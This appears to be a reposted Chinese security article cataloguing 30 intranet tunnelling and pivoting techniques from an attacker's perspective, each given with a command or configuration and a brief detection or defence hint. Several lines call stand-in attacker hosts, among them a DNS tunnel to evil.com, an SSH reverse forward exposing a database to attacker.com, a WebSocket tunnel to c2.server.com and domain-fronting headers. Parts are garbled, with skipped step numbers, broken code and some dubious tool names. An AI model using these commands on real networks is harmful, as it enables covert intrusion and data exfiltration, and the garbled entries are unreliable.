在攻防對(duì)抗中,內(nèi)網(wǎng)穿透是突破網(wǎng)絡(luò)邊界的關(guān)鍵技術(shù)。本文從攻擊者視角系統(tǒng)梳理30種實(shí)戰(zhàn)穿透手法,涵蓋協(xié)議濫用、云原生穿透、IoT設(shè)備滲透等新興攻擊面,并給出企業(yè)級(jí)防御方案。
一、協(xié)議隧道技術(shù)(8種)
1. SSH動(dòng)態(tài)端口轉(zhuǎn)發(fā)
原理:建立加密Socks5代理
ssh -D 1080 -p 2222 user@jump_host -Nf
檢測(cè):非標(biāo)準(zhǔn)端口SSH長(zhǎng)連接監(jiān)控
2. ICMP隱蔽隧道
工具:PingTunnel
ptunnel -p 1.1.1.1 -lp 9001 -da 10.10.10.2 -dp 3389
特征:異常ICMP載荷長(zhǎng)度(>64字節(jié))
3. DNS TXT隧道
實(shí)施:
dnscat2 --dns domain=evil.com --secret=key --max-length=255
防御:限制TXT記錄查詢頻率
4. HTTP分片流隧道
技術(shù)點(diǎn):
- ? 利用Transfer-Encoding: chunked分片傳輸
- ? 偽裝Content-Type為image/jpeg
檢測(cè):HTTP頭與載荷類型不匹配
5. RDP網(wǎng)關(guān)中間人穿透
手法:
- 2. 修改TargetAddress參數(shù)重定向會(huì)話
工具:rdp-tunnel
6. SMTP郵件路由穿透
步驟:
- 1. 控制內(nèi)部Exchange服務(wù)器
- 2. 構(gòu)造特殊郵件頭實(shí)現(xiàn)流量轉(zhuǎn)發(fā):
X-Proxy: http://attacker.com:8080
7. WebSocket SSL隧道
實(shí)現(xiàn):
websocat -E wss://c2.server.com tcp-listen:0.0.0.0:443
檢測(cè):SSL證書指紋異常
8. QUIC協(xié)議穿透
優(yōu)勢(shì):
- ? 基于UDP繞過傳統(tǒng)防火墻檢測(cè)
- ? 0-RTT快速重連特性
工具:quic-tunnel
二、代理轉(zhuǎn)發(fā)體系(6種)
9. Socks5多級(jí)跳板鏈
proxychains4 -q nmap -sT -Pn 10.10.10.0/24
防御:出口流量協(xié)議白名單
10. SSH反向端口轉(zhuǎn)發(fā)
ssh -R 0.0.0.0:3306:localhost:3306 user@attacker.com
檢測(cè):服務(wù)器監(jiān)聽非常見端口
11. Ngrok穿透內(nèi)網(wǎng)服務(wù)
配置:
tunnels:
web:
proto:http
addr:8080
subdomain:internal
特征:*.ngrok.io域名訪問
12. Frp多協(xié)議轉(zhuǎn)發(fā)
架構(gòu):
[frpc] <-> [frps] <-> [Attacker]
隱蔽性:使用STCP模式避免暴露端口
13. 基于CDN的HTTPS穿透
步驟:
- 1. 在Cloudflare Workers部署代理腳本
- 2. 利用Workers KV存儲(chǔ)加密隧道配置
檢測(cè):CDN回源IP異常
14. 域前置技術(shù)(Domain Fronting)
實(shí)現(xiàn):
Host: google.com
X-Forwarded-Host: evil.com
防御:禁用SNI代理服務(wù)
三、云原生穿透(5種)
15. 云函數(shù)反向代理
流程:
- 1. 創(chuàng)建AWS Lambda函數(shù)
- 3. 通過Event參數(shù)傳遞加密指令
防御:限制云函數(shù)出站流量
16. 容器Sidecar流量劫持
手法:
- 1. 篡改K8s Pod的iptables規(guī)則
- 2. 將流量重定向到惡意Sidecar容器
檢測(cè):容器網(wǎng)絡(luò)策略基線監(jiān)控
17. 服務(wù)網(wǎng)格穿透(Istio)
利用:
- ? 修改VirtualService路由規(guī)則
- ? 注入惡意Envoy Filter
工具:meshtunnel
18. 云數(shù)據(jù)庫穿透
案例:
- ? 利用MongoDB Atlas VPC Peering
- ? 通過Stitch Functions建立通道
防御:?jiǎn)⒂脭?shù)據(jù)庫網(wǎng)絡(luò)隔離
19. 云存儲(chǔ)桶穿透
步驟:
- 1. 創(chuàng)建AWS S3靜態(tài)網(wǎng)站
- 2. 利用JavaScript發(fā)起反向連接
檢測(cè):存儲(chǔ)桶跨域策略審計(jì)
四、高級(jí)滲透戰(zhàn)術(shù)(11種)
20. 打印機(jī)協(xié)議內(nèi)存駐留
利用:
- ? 通過LPD協(xié)議回傳數(shù)據(jù)
工具:PRET
21. 工控Modbus TCP隧道
特征:
- ? 使用功能碼16(寫多寄存器)傳輸數(shù)據(jù)
- ? 偽造PLC設(shè)備標(biāo)識(shí)符
檢測(cè):工業(yè)協(xié)議深度解析
22. 虛擬化平臺(tái)VNIC逃逸
手法:
- ? VMware ESXi vSwitch策略繞過
- ? Hyper-V虛擬網(wǎng)卡混雜模式濫用
CVE:CVE-2021-21974
23. 智能家居MQTT代理穿透
配置:
mosquitto_sub -t 'home/#' -h broker.example.com | nc 10.1.1.100 22
防御:MQTT TLS雙向認(rèn)證
24. 無線Mesh網(wǎng)絡(luò)跨VLAN滲透
工具:
- ? 利用OLSR協(xié)議漏洞
檢測(cè):無線頻譜行為分析
25. 區(qū)塊鏈P2P網(wǎng)絡(luò)橋接
實(shí)現(xiàn):
- 1. 創(chuàng)建惡意以太坊節(jié)點(diǎn)
- 2. 通過devp2p協(xié)議建立隧道
特征:異常ENR記錄傳播
26. 郵件客戶端穿透(Outlook)
利用:
- ? 宏代碼調(diào)用WinHTTP對(duì)象
- ? 通過郵件規(guī)則自動(dòng)轉(zhuǎn)發(fā)
檢測(cè):OLE對(duì)象行為監(jiān)控
27. 瀏覽器WebRTC穿透
代碼:
const pc = newRTCPeerConnection();
pc.createDataChannel("tunnel");
防御:禁用STUN服務(wù)
28. 虛擬貨幣礦池穿透
手法:
- ? 利用礦機(jī)固件后門
工具:miner-proxy
29. 生物識(shí)別設(shè)備穿透
案例:
- ? 指紋考勤機(jī)TCP 4370端口轉(zhuǎn)發(fā)
- ? 人臉識(shí)別終端RTSP流重定向
檢測(cè):生物設(shè)備協(xié)議白名單
30. 0day漏洞定制化穿透
特征:
- ? 結(jié)合目標(biāo)系統(tǒng)特性開發(fā)專用隧道工具
- ? 利用未公開的協(xié)議解析漏洞
防御:內(nèi)存保護(hù)技術(shù)(ASLR/DEP)
五、防御體系五層架構(gòu)
- ? 系統(tǒng)調(diào)用審計(jì)(eBPF)
- ? 工業(yè)網(wǎng)絡(luò)物理隔離
閱讀原文:原文鏈接
該文章在 2025/4/11 10:01:55 編輯過
400 186 1886
